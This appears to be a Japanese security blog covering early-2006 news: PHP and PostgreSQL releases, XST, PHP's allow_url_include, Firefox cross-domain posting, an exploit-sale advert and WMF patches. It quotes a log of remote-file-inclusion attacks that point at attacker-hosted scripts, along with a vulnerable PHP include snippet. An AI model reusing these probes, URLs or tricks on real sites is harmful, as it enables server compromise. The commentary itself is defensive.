Thunderbird 1.5のフィッシング対策ツール

数日前に思い切ってThunderbird 1.0から1.5にアップグレードしました。フィッシング対策ツールが付いてくるのは知っていましたがどの様な場合に知りませんでした。

調べて見ると

– URLがIPアドレスの場合
– URLのリンク先として表示されたアドレスと実際にリンク先が異なる場合

にフィッシングメールと判定されるようです。

シンプルな機能ですが役には立ちます。ただしエンドユーザはこの手のセキュリティ機能に不可能はほどの性能を期待している事がおおいので多少心配な機能でもあります。

HTMLメールのリンクをクリックする場合は実際のリンク先がどうなっているかチェックする習慣はついていますがあると便利なのは確かですね。
# この機能があると頼ってしまいそうですが。

GPLv3 Draft

DRMに関わるコードにはGPLv3は使えない、GPLが適用されたプログラムに関わる特許権の行使の制限、が特に注目すべき箇所のようです。

Windowsソースコード開示へ

米マイクロソフト社は25日(米国時間)、欧州連合(EU)の反トラスト是正命令に応じて、ウィンドウズ・オペレーティング・システム(OS)のソースコードを一部ライセンス開示すると発表した。

OSもですがInternet Explorerのソースコードがあると更に多くの攻撃方法が判明する可能性は非常に高いと思われます。セキュリティ研究系の会社もライセンスできるくらいの料金でライセンスされるのか興味深いですね。

CHECK PC!マナベに学べ。

経済産業省のPCセキュリティ啓蒙サイト。

PCをもっと安全、安心に活用できるネット社会を目指して活動しています。

是非「ウィルス」「不正アクセス」「フィッシング」「スパイウェア」各項目の注意点に追加してほしい物もありますが最初の一歩としてはこれでも良いかなと思います。

リンク先はあまり素人向けでない所もありますが、最初は仕方ないでしょう。

XSTを知ってますか?

XSTとはCross Site Tracingの事で2003年にその危険性が指摘されました。

簡単に言うとクロスサイトスクリプティングに脆弱なWebサイトはTRACEメソッドでBasic認証のクレデンシャル(ユーザ名とパスワード)を盗まれてしまう、と言う問題です。当時、XmlHttpRequestが他のサイトにもリクエストを送信できたので非常に大きな問題でした。

現在のWebサーバはTRACEメソッドはデフォルトで無効にしてあります。今は大丈夫なハズだったのですがプロキシがある環境では大丈夫で無いかも、というレポートです。プロキシがTRACEメソッドを受け付けているとTRACEメッセージを返してしまうのかも知れません。実際に攻撃可能かは書いてないのですがsquid, apacheをプロキシとして利用している場合の対策が載っています。

Basic認証でユーザ管理をし、クッキーを利用するセッション管理していないのでクロスサイトスクリプティングの脆弱性を修正せずにいるサイト等が攻撃対象になります。

実はWebサイトのセキュリティ書籍を執筆していた時にXSTも解説していました。思いもよらない部分(TRACEメソッドのデフォルトでの有効化)でセキュリティホールが出来てしまった過去の例、として取り上げていたのですが現在進行形になったようです。まだ修正が間に合うので直さないとならないですね。
♯ 実際に攻撃可能か確認しないとならないですが。

allow_url_includeオプションの追加

CVS HEADでは昨年11月にallow_url_includeオプションが追加されています。allow_url_fopenからinclude/require文の設定を分離するオプションです。

このオプションを付けると万が一、

$dir = $_GET[‘dir’];
…..
…..
include($dir.$file);

の様なコードがあってもhttp://, ftp:// は使えなくなります。(SSL/TLSも)ただしphp://inputは使えます。ですから今ひとつなパッチですが無いよりましです。

私がPHP 5.1.2用にバックポート(ほとんどオリジナルと同じですが)はこちらです。
http://wiki.ohgaki.net/index.php?PHP%2Fpatch%2Fallow_url_include

PostgreSQL 8.1.2リリース

PostgreSQL 8.1.2, 8.0.6, 7.4.11 と 7.3.13がリリースされています。

8.0と8.1の変更

— Character string locale comparison bug. This may require a REINDEX
on text column indexes in some locales, such as Hungarian.
— Prevent accidental changes of locale by plperl
— Two fixes for Japanese encodings
— Two fixes for COPY CSV
— Fixes for functions returning RECORD
— Fixes to autovacuum, dblink and pgcrypto

pgsql-jpに載っていますが問題が発生した場合分かりづらい日本語エンコーディング問題の修正が含まれています。

PHP 4.4.2リリース

PHP 4.4.2がリリースされました。

* Prevent header injection by limiting each header to a single line.
* Possible XSS inside error reporting functionality.
* Missing safe_mode/open_basedir checks into cURL extension.
* Apache 2 regression with sub-request handling on non-Linux systems.
* key() and current() regression related to references.

全部だったか覚えていませんが廣川さんがコミットしたmbstringモジュールの修正も含まれているはずです。

クロスドメインポスティング

FirefoxがIFRAME内だとクロスドメインポストに警告を表示しない、という問題。

[Full-disclosure] Firefox 1.5 allow cross-domain posting to secured pages

just drop a hidden IFRAME in the form, set its src to username:password@123.com and Firefox is fooled into thinking that it is not a cross-domain posting. So no warning pops up. You can also drop the U/P on the URL in the forms action since the IFRAME has already logged in.

例としてデフォルトユーザ/パスワードのルータのFirewallを解除できるとしています。デフォルトユーザ/パスワードのままのルータは直接攻撃が可能なのですが、攻撃元を判り辛くするためにクラックしたWebサーバに攻撃用ページを作って、という事が考えられるかな。

SQLite 3.3.0 Alpha

SQLite 3.3は結構変わりますね。
Alphaなのでデフォルトの仕様は変わるかもしれませんが3.3は3.x系列のファイルは読めるが、3.3より以前のバージョンのSQLiteでは読めない、という点には注意が必要ですね。

* CHECK constraints are now enforced.

* The IF [NOT] EXISTS syntax of MySQL is now recognized on
CREATE/DROP TABLE/INDEX statements.

* DESC indices really are descending now. The DESC keyword
on index definitions used to be ignored.

* The database file format has changed slightly to more
compactly represent boolean values and to support DESC
indices. Version 3.3.0 will read and write all prior
version 3 databases. But new databases created by
version 3.3.0 will not be readable by older versions
of SQLite. If this is a problem for your application,
compile SQLite using

-DSQLITE_DEFAULT_FILE_FORMAT=1

and then version 3.3.0 will create new databases in
the legacy format understood by all prior versions of
SQLite. DESC indices only work in the new format.

* SQLite now distinguishes between REAL and INTEGER columns
and attempts to make appropriate conversions.

* The OS-interface layer has been modified for greater
flexibility and control of custom ports and implementations.

* SQLite now responses better to out-of-memory errors. The
library will recover and reset itself automatically. There
is no longer a need to call sqlite3_global_recover(). The
new sqlite3_enable_memory_management() API can be used to put
SQLite into a mode where it will automatically try to reduce
its database cache size when it comes under memory pressure.

* The database cache and parsed schema information can now
optionally be shared between two or more database connections.
This can be used to reduce I/O and to improve concurrency.
On a database using a shared cache, you can specify
READ UNCOMMITTED isolation as an option (the default is
SERIALIZABLE). With READ UNCOMMITTED, a reader will not
block or be blocked by a writer and you will never get
an SQLITE_BUSY error on a read.

PHP 5.1.2リリース

重要なセキュリティフィックスが含まれています。

* HTTP Response Splitting has been addressed in ext/session and in the header() function.
* Fixed format string vulnerability in ext/mysqli.
* Fixed possible cross-site scripting problems in certain error conditions.
* Hash & XMLWriter extensions added and enabled by default.
* Upgraded OCI8 extension.
* Over 85 various bug fixes.

最近のキャッシュサーバやクライアントはHTTP Response Splitting攻撃にある程度強くなっている、とはいえサーバの不備はサーバ管理者の責任ですから5.1を使っている方はアップグレードした方が良いと思います。

関連エントリ:
https://www.codeblog.org/blog/yohgaki/?date=20060113

codeblog.org

Codeblogというプロジェクトに協力させていただく事になりました。
こちらの個人用ブログも更新しますがあまり更新されてない場合などはcodeblogの方もご覧ください。

脆弱性の販売

full-disclosureから。

少し前にeBayでセキュリティホールをオークションに出ていとブログに書きました。
今度は自分のWebサイトだけでなくMLに広告まで出しています。iDefense等は購入しなかったようです。企業としては正しい判断だと思います。基本的には無視が一番だと思いますが、この様な場合どう対処するべきなんでしょうね。

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1

It has not been possible for me to reach an agreement with zdi nor
idefense for selling the excel bug because I have publicly warned
about a remote command execution in my forum, I have tried to excuse
me about my selfstarting mistakes in the rssponsible disclosure nor to
explain them then if I find a 2nd excel critical bug , how can I
submit it to them since I have publicly warned about an excel flaw ?
You should reject actually any excel flaw no ?
No that’s it , they leave me alone with a critical excel flaw, so I
have no other way now to get paid for my research to leave an announce:

A critical excel flaw is for sale, if you wish to buy it what do you
will have:

– -full advisory (explaining how I have found it , how I exploit it)
– -full poc building a xls file, once this file opened , excel will
arbitrary run regedit.exe, a bindshellcode, or add an admin user.
– -you have all rights on it , since Im alone able to exploit it, you
will trust me, I never share privately, you will be the only owner of it.

if you wish to see what the bug does, I can compute some videos on
demand. And of course if you are willing to buy it , do not offer
something ridiculous.

for any informations , excel_for_sale@heapoverflow.com

note: I know this look like a joke, but I’m serious , I should be paid
for my security research , and I really dont want to help microsoft
for free, the auction is up for whitehats and blackhats, thanks to the
resposible programs on this.
I know I have made a mistake but this was still up to you to stop me.
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ8WG5q+LRXunxpxfAQJj3g//bc7pkBjMyBH8tey3XT6FaCIOI4toxdeZ
xeIBVjafFHddvwUIARDEO/FIy3RGNZbfY4O3y+NC+CyhJVc+HcMFplns9AYCutNk
P7WcQ+Ax8KJth4Bo2ol2B53gdLZ6rnSWyp8Xua2GWc9Z9d6rbfrQHZaY9s53j8XP
ITmo4Yoly1A8NnD3m1ZDRN2TrDsaBZQbd97vfi20oHUH41VAN9b/lU3UI9+QC8oo
TZVDVvYi4YTnNEUfWW5CQlJ9+kDxRPfRMhOVMo/oSXgbD/56s5vRHB7eMxakLWBb
jwrdTQ/5S7ez20sK3UIZmV3919TPVHQK0NF4OX8ZpLsHPrguDUUZXXePzMcnnibl
MHGkBVIegCojHyQth8WiHo0adCAoOcuIdFXmaXXFmg3NSstsv6AFQ64fJO7vOJYs
HJ0X5BKHHTPdIElT9Uzbif5UfdARCIOhgcF/e2hXpHX7PJYXahZTUtOYLmfQbIeT
QMRJL8wH1lIAhBJiIWo+ZUJ6YgnovS8YBsffYjtRUVe7e0v+oZsuAp6c4A0XWP7O
rywj7aXT8xsz5mkHGuN9W9EiKq7XgO0d3EGyp0XZcm03CuAriCwLN/exx1bJkcw/
gCsebwGTSHbyzVDyioqjfdNskQwIakmFZvlPGC3+9Rv1aiYogH8CpBOIJgvBvkCW
kmCQMX9ui1Y=
=khwl
—–END PGP SIGNATURE—–

ファイルインクルードブルートフォース攻撃

webappsecでこんなメールを見かけました。

For the most part I ignore the dozens of daily attacks against my system but this one caught my eye. Looks like some defacing groups are writing/implementing
perl scripts to identify query strings, and attempt php inclusion attacks against them (not using known exploits). Below is a log snippet.

202.226.224.67 – – [08/Jan/2006:21:32:43 -0500] “GET / HTTP/1.0” 200 37172 “-” “lwp-trivial/1.35” 202.226.224.67 – – [08/Jan/2006:21:32:44 -0500] “GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 37172 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:45 -0500] “GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 24083 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:46 -0500] “GET /phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 30626 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:47 -0500] “GET /database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 24267 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:48 -0500] “GET /appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 24521 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:49 -0500] “GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 47471 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:50 -0500] “GET /archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 25445 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:51 -0500] “GET /development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 24286 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:52 -0500] “GET /ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 29316 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:53 -0500] “GET //pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 29892 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:54 -0500] “GET /ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 28338 “-” “lwp-trivial/1.35”
202.226.224.67 – – [08/Jan/2006:21:32:55 -0500] “GET /appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0” 200 24073 “-” “lwp-trivial/1.35”

The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at http://www.sanicentrum.be/private/therules25.dot
and the many scripts it uses/looks for.

Working Referenced Links
* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (Of Interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (Because every defacement group needs html templating 🙂

Non working (at this time)
* http://www.sanicentrum.be/private/safe25.dot

I’ve contacted sans since the parent host *appears* to be hacked.

– Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]

——————————————————————————-
Watchfire’s AppScan is the industry’s first and leading web application
security testing suite, and the only solution to provide comprehensive
remediation tasks at every level of the application. See for yourself.
Download AppScan 6.0 today.

https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh
——————————————————————————-

Perlスクリプトでブルートフォース的にファイルインクルードバグがあるPHPスクリプトの攻撃を試みているようです。調べて見ると、私のサーバにも同様のアクセスログが残っていました。トップページにあるリンクを抽出し、クエリ文字列部分を書き換えて試してみる作りになっているようです。攻撃用のPHPスクリプトは削除されていて今はアクセスできないようです。

スクリプトインジェクションが出来るのであまり役に立たないとはいえallow_url_fopen=offなら万が一スクリプトインクルードバグがあってもこの攻撃からは守れますね。

WMFアップデート

Graphics Rendering Engine の脆弱性によりコードが実行される可能性がある (912919) (MS06-001) の対応ですがWindowsUpdateにも対応しています。確かにインストールしてましたね。

関連:
ログオン時にインストールできるWMF Hotfix
http://blog.ohgaki.net/index.php/yohgaki/2006/01/03/a_sa_da_oa_sa_a_la_ca_sa_sa_a_fa_la_sa_a

SpamメールでのWMF攻撃
http://blog.ohgaki.net/index.php/yohgaki/2006/01/02/spama_ia_fa_la_sa_rwmfa_ra

RFID-Zapper – RFIDの無効化プロジェクト

RFID防止財布は財布に入っているタグ付きカード等をRFIDリーダから保護するものですが、こちらはRFIDを壊して使えなくすることを目的としています。

The RFID-Zapper is a gadget to deactivate (i.e. destroy) passive RFID-Tags permanently.

とあるように完全に壊すことを目的としています。

The project is almost finished.
We modified several single-use-cameras into RFID-Zappers and have successfully tested them.

使い捨てカメラを改造してRFIDタグを壊せるようにしているようです。もうテストのために壊すRFIDタグが無くなったそうで募集しています。

誰でも作れるような物だそうです。
くれぐれも悪用しないように。

セキュリティ対策の基本とセーフガード

備考:かなり古いブログですが公開し忘れしていた分です。

セキュリティ対策の基本とセーフガードを

セキュリティ対策の基本は

-外部システム(人間を含む。DNS、メールのデータ等も)は信用しない
-信用できないデータは確実に確認する
-外部システムに出力する場合は外部システムの仕様に従った形式で出力する

ですがセーフガードの話をしているのに「本来セキュリティは…」と説明し始めるケースがよくあります。

セーフガードは「問題が発生しても問題を最小限に留める仕組み」であるのでセーフガードの話をしているのに「本来セキュリティは …」と議論をすりかえられては議論になりません。セーフガードが必要無いならJavaやC#なんて使わなくてもC++を使ってポインタをバリバリ操作すれば良いです。JavaにもSandboxなんて必要ないです。PHPのopen_basedir設定も無用です。OSでNXビットをサポートする必要もないし、アンチウィルスソフトも必要無いです。

基本を解ってない人と話をするのは骨が折れます…

やはり、まだある単純リモートスクリプト実行バグ.. どころか

少し前に「やはり、まだある単純リモートスクリプト実行バグ..」と書いていますが、まだあるどころか「まだまだ出てくる」という感じですです。

まず、phpDocumentator、これのテスト用スクリプトにはリモートファイルを実行できるバグがあります。それから、onBoardこれも全く同じくリモートコードを実行できるバグがあります。

onBoardはよく知りませんが、phpDocumentatorは広く使われていると思います。クラックされる可能性が高いのでテスト用コードは削除しておきましょう。(と言うより普通はphpDocumentatorを公開する必要がないので、非公開にしましょう。これ以外にテスト用スクリプトにはリモートスクリプト実行以外にもXSS問題も指摘されています。)

前のブログで当然直っていると思っていたphp://input問題が修正されていない旨のコメントを頂きました。驚いたことに本当に修正されていません。ですからallow_url_fopen=offすればリモートコードの実行は防げますが、リモートからのコードインジェクションは防げません。

php://inputは生のPOSTデータ扱うときに使えるから、などと言っている場合ではないのですが… php://inputを導入した事により今まで無かった脆弱性を作っているは明らかなのですけどね… 新しい脆弱性が仕様です(しかも簡単に直せる)と言うのは受け入れがたいですね。

ログオン時にインストールできるWMF Hotfix

アンオフィシャルなWMF Hotfixがありますが、ダイアログ、メッセージなどが一切出ずにインストールできるHotfixもあるそうです。ログオンスクリプトでインストールする事も可能になります。

私はこのHotfixをインストールしていません。とりあえずMSサイトに記載されていたdllの登録を解除しただけです。
http://blog.ohgaki.net/index.php/yohgaki/2005/12/30/wmfe_afpa_sa_lamfa_a_a_ra

アンオフィシャルなHotfixは、一部で全てのケースに対応できないなどとも言われているようです。
ところでWindows 3.0にもこの脆弱性があるそうです。古い問題だったのですね。

関連エントリ:
http://blog.ohgaki.net/index.php/yohgaki/2006/01/02/spama_ia_fa_la_sa_rwmfa_ra